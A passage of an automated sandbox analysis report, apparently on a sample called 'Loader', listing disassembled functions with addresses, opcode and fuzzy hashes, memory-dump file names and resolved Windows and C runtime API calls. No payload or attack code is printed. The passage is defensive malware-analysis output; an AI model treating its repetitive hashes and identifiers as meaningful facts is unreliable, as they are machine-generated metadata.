Instruction Fuzzy Hash: 9CF0E5B6B04611ABDB2399589CD0F37BB9CCB9B324F1D082AF88597642D3619845C3E6

Function 001CD8F6 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9b762df6b946add33c8a07fbdf58f8ba93535ce19c65dbda044d14d977b7c93
Instruction ID: 6b1bc862d8a8fb0ab9637bace7fbd58647d2e0be19f5761834d7f5db0259b279
Opcode Fuzzy Hash: c9b762df6b946add33c8a07fbdf58f8ba93535ce19c65dbda044d14d977b7c93
Instruction Fuzzy Hash: 09F01774645B409BD3218F249C91BA7BBF4FB0A708F145A2CE9C666592D360F809C718

Function 00200FD0 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c70052da55240df270b89936481df9dfe3845e990ec9a0c4650baec86b6953da
Instruction ID: d2ff77c061e2f7469c72e79564278c2da2bc67103c34b87218cd4374b0ebfb62
Opcode Fuzzy Hash: c70052da55240df270b89936481df9dfe3845e990ec9a0c4650baec86b6953da
Instruction Fuzzy Hash: E2D05B65A10244379554A52ADD5BE377D7D8743595F402124FC41E7395D810DC1543EA

Function 001AA937 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 110e375efb2033e03ce8b70e48f77e8cdc524782d876c586b63fa1f672508759
Instruction ID: b0ef354620ba5ec77e02521d49c9742e63de698bbb7b003f64d7f3dbf7d0ec19
Opcode Fuzzy Hash: 110e375efb2033e03ce8b70e48f77e8cdc524782d876c586b63fa1f672508759
Instruction Fuzzy Hash: C2E08C32911228EBCB15DB88C94498AF3ECEF46F44B524496B501E3200C370DF00CBD0

Function 001FCD00 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction ID: cae5c28952eedd864d10f8e7c95f9fe55d19148efead6a5c216919b66f455deb
Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction Fuzzy Hash: FDD0A72160832946AB748E19E50097BFBF0EAC7B11F49956EFA82E3148D330EC41D2E9

Function 001DC673 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb8a45a0f10526e0d20210d5510e31f851a89abbb4eb8b5f4c554dc639634a30
Instruction ID: 19355a9386c080a6bb533a2aa9030752ece54d13a0d7f7ff299c908fbe13c8c4
Opcode Fuzzy Hash: bb8a45a0f10526e0d20210d5510e31f851a89abbb4eb8b5f4c554dc639634a30
Instruction Fuzzy Hash: 94C04C79D48204AAD6049F00ED51B35B7799B87704F106429F549675A2D631D8109B1D

Function 001A0D89 Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 352c58746815d872af4b3af9a2255c15039a5ed1f7fec551035c6ea349d431e8
Instruction ID: 54639d2b2ae9d86cbb315baf5ec8b42acf824d9952c4ee313fa3ac52a3354805
Opcode Fuzzy Hash: 352c58746815d872af4b3af9a2255c15039a5ed1f7fec551035c6ea349d431e8
Instruction Fuzzy Hash: F7C08C3D01190046CEAA899082713A93364ABE7782FC0148CCC832B642C71EACC2D711

Function 001EA813 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64024bcfd5821b9c218a5da5752519fb94f898f422c8eaf5205e93918c3d40fb
Instruction ID: 23ac4f7aa94129611e337dd590c213858f2342a8c8eed4acfbb50f4d96c4c42d
Opcode Fuzzy Hash: 64024bcfd5821b9c218a5da5752519fb94f898f422c8eaf5205e93918c3d40fb
Instruction Fuzzy Hash: 8FB092A9C02424AA90122F103C069AEB0262D33208F892134E84632202A716DA1A809F

Function 001EAAD8 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7844b02a572a49535684d15743fa2b0f32e8e4bf9486e8a4cd92e739e29f041
Instruction ID: d4b440e43fb62d22130e4f89ab47c8d9ce3a1a00332895032c063680befe7cda
Opcode Fuzzy Hash: b7844b02a572a49535684d15743fa2b0f32e8e4bf9486e8a4cd92e739e29f041
Instruction Fuzzy Hash: FCB09B74D44740D7C5006F316C8153DB1796F7B204F04357CB547331139B34D409451E

Function 001EA3A5 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 822fe4464400a46e8f72fc0999604445f7dd256f2e45a0655ff79b18d20bb17c
Instruction ID: 24ee68e9cf35ca46f9a6c8df4466c534dd223dfd3ccd4b545064954b021d0c2e
Opcode Fuzzy Hash: 822fe4464400a46e8f72fc0999604445f7dd256f2e45a0655ff79b18d20bb17c
Instruction Fuzzy Hash: 72A00221C9C3049681045D005D00079F679598B512E697408D04C37601D230E905576D

Function 00203EC4 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2449faf6718c11823471f0839d5c75a09908f1381fbbdfabfc9eb93348329903
Instruction ID: c91e9ea92e80b2859915e8bc43d97a3ab284b56197b9843f6884ef5b5e030273
Opcode Fuzzy Hash: 2449faf6718c11823471f0839d5c75a09908f1381fbbdfabfc9eb93348329903
Instruction Fuzzy Hash: 00A00224E982008A8249CF149850A70E2B9574F102F50792C800DF3563DA21D400860C

Function 00201FD2 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 516ddb1a39b2c03d9e1b326386d71392f92e3583c1ec0344d3f8b719679b5916
Instruction ID: 47513a061ab63e32abfa2e4f2e5d85209856904908b63c157151e5a83fe5ca1e
Opcode Fuzzy Hash: 516ddb1a39b2c03d9e1b326386d71392f92e3583c1ec0344d3f8b719679b5916
Instruction Fuzzy Hash: 19A00275D48115CB87104E449550174F339554B115F1D76518C08331124335F911458C

Function 001A75BF Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298COMMONLIBRARYCODE

Download Yara Rule

Strings

, xrefs: 001A7838

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: 30ae17a9c98b78930a4103a37ba2af49b74f639fa865806eaeb75c96fe9991ed
Instruction ID: 60ec781d8513a021da3ce0247946aa7e5f4607e2bd4e71473f1a1595e10b6006
Opcode Fuzzy Hash: 30ae17a9c98b78930a4103a37ba2af49b74f639fa865806eaeb75c96fe9991ed
Instruction Fuzzy Hash: F0B12578A08245DFDF05DFA9DC84BAEBBB5AF96310F148159E404AB2D2CB349F41CB61

Function 0019A1A8 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 0019A2C7
___TypeMatch.LIBVCRUNTIME ref: 0019A3D5
CallUnexpected.LIBVCRUNTIME ref: 0019A542

Strings

csm, xrefs: 0019A1E5
csm, xrefs: 0019A2FE
csm, xrefs: 0019A252

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: CallMatchTypeUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 1206542248-393685449
Opcode ID: 431a1a89ae57b6e7917a7b4f78c6a113fcb8d02859028e1342aa7ffe107b6cb6
Instruction ID: 975ac11d143191924c6a25af9dc02371b117e8a37d8a22cb8c6deb27397bd708
Opcode Fuzzy Hash: 431a1a89ae57b6e7917a7b4f78c6a113fcb8d02859028e1342aa7ffe107b6cb6
Instruction Fuzzy Hash: 1CB1AD71800209EFCF25DFA8C8859AEBBB5FF24310F95419AE8006B212D771EE55CBD2

Function 001A352F Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,001A363C,?,?,00000000,00000000,?,?,001A37EA,00000021,FlsSetValue,001B69C8,001B69D0,00000000), ref: 001A35F0

Strings

api-ms-, xrefs: 001A3586
ext-ms-, xrefs: 001A359A

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 954e9b5ebd0d443c6bfc165a5448fc314c5ae990cd43338a8f01d82632c60967
Instruction ID: b17c03ff05ad46bd6f06b01abe7b54ad611bf4e1da037ff65d3798138731556d
Opcode Fuzzy Hash: 954e9b5ebd0d443c6bfc165a5448fc314c5ae990cd43338a8f01d82632c60967
Instruction Fuzzy Hash: 7A210A39E01210FBCB219B29EC49B9A7759AF53774F250215F935A7291EB30EF05CAD0

Function 00193819 Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00193820
std::_Lockit::_Lockit.LIBCPMT ref: 0019382A
int.LIBCPMT ref: 00193841

Part of subcall function 001916DA: std::_Lockit::_Lockit.LIBCPMT ref: 001916EB
Part of subcall function 001916DA: std::_Lockit::~_Lockit.LIBCPMT ref: 00191705

codecvt.LIBCPMT ref: 00193864
std::_Facet_Register.LIBCPMT ref: 0019387B
std::_Lockit::~_Lockit.LIBCPMT ref: 0019389B
Concurrency::cancel_current_task.LIBCPMT ref: 001938A8

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
String ID:
API String ID: 2133458128-0
Opcode ID: d596c8b56cc9fd85446bb08de09315fb678e42f0a98c2bfe023bc6972e4a3e0f
Instruction ID: 1b182c57e126e512141ae7982472b96ecc5f41ef07da2caf866498b1f348f4cb
Opcode Fuzzy Hash: d596c8b56cc9fd85446bb08de09315fb678e42f0a98c2bfe023bc6972e4a3e0f
Instruction Fuzzy Hash: 5501D235D04116ABCF05EBA4C8456ADB7B1AFA4320F550508F825AB381DF74DF458B91

Function 0019667B Relevance: 9.2, APIs: 6, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 001966C4
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0019672F
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0019674C
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0019678B
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001967EA
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0019680D

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: 3c42810f0402d8cdfbfa6612ac12c8da37f89ab8d3bdaabd14faf034bfb2b275
Instruction ID: fd4b63b902547f498e14e84cbed655e9666f95d68cb95f89ca96952b8a40a8a6
Opcode Fuzzy Hash: 3c42810f0402d8cdfbfa6612ac12c8da37f89ab8d3bdaabd14faf034bfb2b275
Instruction Fuzzy Hash: 6951AE72A0021AEFEF249FA1CC45FAB7BA9EF44794F254529F914A6150DB30DD50CBB0

Function 00194F43 Relevance: 9.1, APIs: 6, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00194F4A
std::_Lockit::_Lockit.LIBCPMT ref: 00194F54
int.LIBCPMT ref: 00194F6B

Part of subcall function 001916DA: std::_Lockit::_Lockit.LIBCPMT ref: 001916EB
Part of subcall function 001916DA: std::_Lockit::~_Lockit.LIBCPMT ref: 00191705

std::_Facet_Register.LIBCPMT ref: 00194FA5
std::_Lockit::~_Lockit.LIBCPMT ref: 00194FC5
Concurrency::cancel_current_task.LIBCPMT ref: 00194FD2

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: b1bc25d12063d9bb8556d879209d8f1f5e00d0e0c9235c758c8e41be24456ea2
Instruction ID: 071e3ce6b808f8853311382808dd58a7975ea228392fddc9d96cc7b245dd6070
Opcode Fuzzy Hash: b1bc25d12063d9bb8556d879209d8f1f5e00d0e0c9235c758c8e41be24456ea2
Instruction Fuzzy Hash: 19110371900219ABCF05EB68C846BAEB7F9AF64320F120509F425A7381DFB4EE418B91

Function 00199E3A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00199E31,0019802B,001976E5), ref: 00199E48
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00199E56
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00199E6F
SetLastError.KERNEL32(00000000,00199E31,0019802B,001976E5), ref: 00199EC1

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 35717d709cf17fc26ad939ebd297f6fe03aed37d9f9f23a27a922b4b02a763e6
Instruction ID: 2193068ae8c52f756d8395eed581381516a460575a4c5f5a83a64c50def2988e
Opcode Fuzzy Hash: 35717d709cf17fc26ad939ebd297f6fe03aed37d9f9f23a27a922b4b02a763e6
Instruction Fuzzy Hash: 9C01F73260D611EEAF257BB9BDC676B3A99FB11775720033DF121811F0EFA24C419141

Function 001A0DAB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,C0416D80,?,?,00000000,001B1F55,000000FF,?,001A0D3B,001A0E6B,?,001A0D0F,00000000), ref: 001A0DE0
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001A0DF2
FreeLibrary.KERNEL32(00000000,?,?,00000000,001B1F55,000000FF,?,001A0D3B,001A0E6B,?,001A0D0F,00000000), ref: 001A0E14

Strings

CorExitProcess, xrefs: 001A0DEA
mscoree.dll, xrefs: 001A0DD9

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
